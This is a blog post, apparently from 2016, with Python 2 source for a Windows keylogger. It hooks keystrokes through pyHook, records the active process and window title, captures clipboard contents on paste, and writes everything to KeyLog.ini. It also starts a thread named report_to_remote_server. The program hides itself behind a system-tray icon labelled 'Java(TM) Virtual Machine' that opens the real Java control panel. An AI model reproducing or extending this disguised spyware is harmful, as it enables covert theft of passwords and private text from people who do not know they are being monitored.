py编写键盘记录器初步

  • 调用win32 API记录键盘事件、窗口事件
#
def get_current_process():

    # 获取最上层的窗口句柄
    hwnd = user32.GetForegroundWindow()

    # 获取进程ID
    pid = c_ulong(0)
    user32.GetWindowThreadProcessId(hwnd,byref(pid))

    # 将进程ID存入变量中
    process_id = "%d" % pid.value

    # 申请内存
    executable = create_string_buffer("\x00"*512)
    h_process = kernel32.OpenProcess(0x400 | 0x10,False,pid)

    psapi.GetModuleBaseNameA(h_process,None,byref(executable),512)

    # 读取窗口标题
    windows_title = create_string_buffer("\x00"*512)
    length = user32.GetWindowTextA(hwnd,byref(windows_title),512)

    # 打印
    # print
    # print "[ PID:%s-%s-%s]" % (process_id,executable.value,windows_title.value)
    # print
    Thread(target=report_to_remote_server).start()
    output_file('','KeyLog.ini',"\n[ PID:%s-%s-%s] %s\n" % (process_id,executable.value,windows_title.value,time.strftime("%Y/%m/%d %H:%M:%S")));

    # 关闭handles
    kernel32.CloseHandle(hwnd)
    kernel32.CloseHandle(h_process)

# 定义击键监听事件函数
def KeyStroke(event):

    global current_window

    # 检测目标窗口是否转移(换了其他窗口就监听新的窗口)
    if event.WindowName != current_window:
        current_window = event.WindowName
        # 函数调用
        get_current_process()

    # 检测击键是否常规按键(非组合键等)
    if event.Ascii > 32 and event.Ascii <127:
        # print chr(event.Ascii),
        output_file('','KeyLog.ini',chr(event.Ascii))
    else:
        # 如果发现Ctrl+v(粘贴)事件,就把粘贴板内容记录下来
        if event.Key == "V":
            win32clipboard.OpenClipboard()
            pasted_value = win32clipboard.GetClipboardData()
            win32clipboard.CloseClipboard()
            # print "[PASTE]-%s" % (pasted_value),
            output_file('','KeyLog.ini',"[PASTE]-%s" % (pasted_value))
        else:
            # print "[%s]" % event.Key,
            output_file('','KeyLog.ini',"[%s]" % event.Key)
    # 循环监听下一个击键事件
    return True

def RegisterKeyListener():
    # 创建并注册hook管理器
    kl = pyHook.HookManager()
    kl.KeyDown = KeyStroke

    # 注册hook并执行
    kl.HookKeyboard()
    pythoncom.PumpMessages()

但是对于QQEdit.exe,记录值会受到干扰。

  • 日志记录
def output_file(dir,name,content):
    fileName = ''
    if len(dir)>0:
        fileName = fileName+dir + "/"
    fileName = fileName + name#.encode('utf-8','ignore')
    f = open(fileName,"a")
    f.write(content)
    # print "Output file",fileName
  • Tk GUI

支持异步多线程操作的UI库

class Tk_App:
    def __init__(self,master):
        #构造函数里传入一个父组件(master),创建一个Frame组件并显示
        frame = Frame(master)
        frame.pack()
        #创建两个button,并作为frame的一部分
        self.button = Button(frame, text="QUIT", fg="red", command=sys.exit)# frame.quit
        self.button.pack(side=LEFT) #此处side为LEFT表示将其放置 到frame剩余空间的最左方
        self.hi_there = Button(frame, text="Hello", command=self.say_hi)
        self.hi_there.pack(side=LEFT)
        # Thread(target=RegisterKeyListener).start()
        # sys.stdout.flush()

    def say_hi(self):
        print "hi there, this is a class example!"

TRAY_TOOLTIP = 'Java(TM) Virtual Machine'
TRAY_ICON = 'icon.png'


def create_menu_item(menu, label, func):
    item = wx.MenuItem(menu, -1, label)
    menu.Bind(wx.EVT_MENU, func, id=item.GetId())
    menu.AppendItem(item)
    return item


class TaskBarIcon(wx.TaskBarIcon):
    def __init__(self,frame):
        self.frame=frame
        super(TaskBarIcon, self).__init__()
        self.set_icon(TRAY_ICON)
        self.Bind(wx.EVT_TASKBAR_LEFT_DOWN, self.on_left_down)
        mainth.start();

    def CreatePopupMenu(self):
        menu = wx.Menu()
        # create_menu_item(menu, 'Say Hello', self.on_hello)
        create_menu_item(menu,'Control Panel',self.on_control);
        menu.AppendSeparator()
        create_menu_item(menu, 'Exit', self.on_exit)
        # create_menu_item(menu, 'Exit', sys.exit)
        return menu

    def set_icon(self, path):
        icon = wx.IconFromBitmap(wx.Bitmap(path))
        self.SetIcon(icon, TRAY_TOOLTIP)

    def on_left_down(self, event):
        print 'Tray icon was left-clicked.'

    def on_hello(self, event):
        print 'Hello, world!'


    def on_control(self,event):
        # print r'"%JAVA_HOME%\jre\bin\javacpl.exe"'
        # os.system(r'cd /d %JAVA_HOME%');
        os.system(r'""%JAVA_HOME%\jre\bin\javacpl.exe""');
        # print os.path.realpath(sys.argv[0])
        # print os.path.dirname(sys.argv[0])
        # print os.path.basename(sys.argv[0])

    def on_exit(self, event):
        wx.CallAfter(self.Destroy)
        self.frame.Close()
        mainth._Thread__stop()
        # sys.exit()

class App(wx.App):
    def OnInit(self):
        frame=wx.Frame(None)
        self.SetTopWindow(frame)
        TaskBarIcon(frame)
        return True
Author

Semprathlon / Simfae Dean

Posted on

09/09/2016

Updated on

07/19/2023

Licensed under

Comments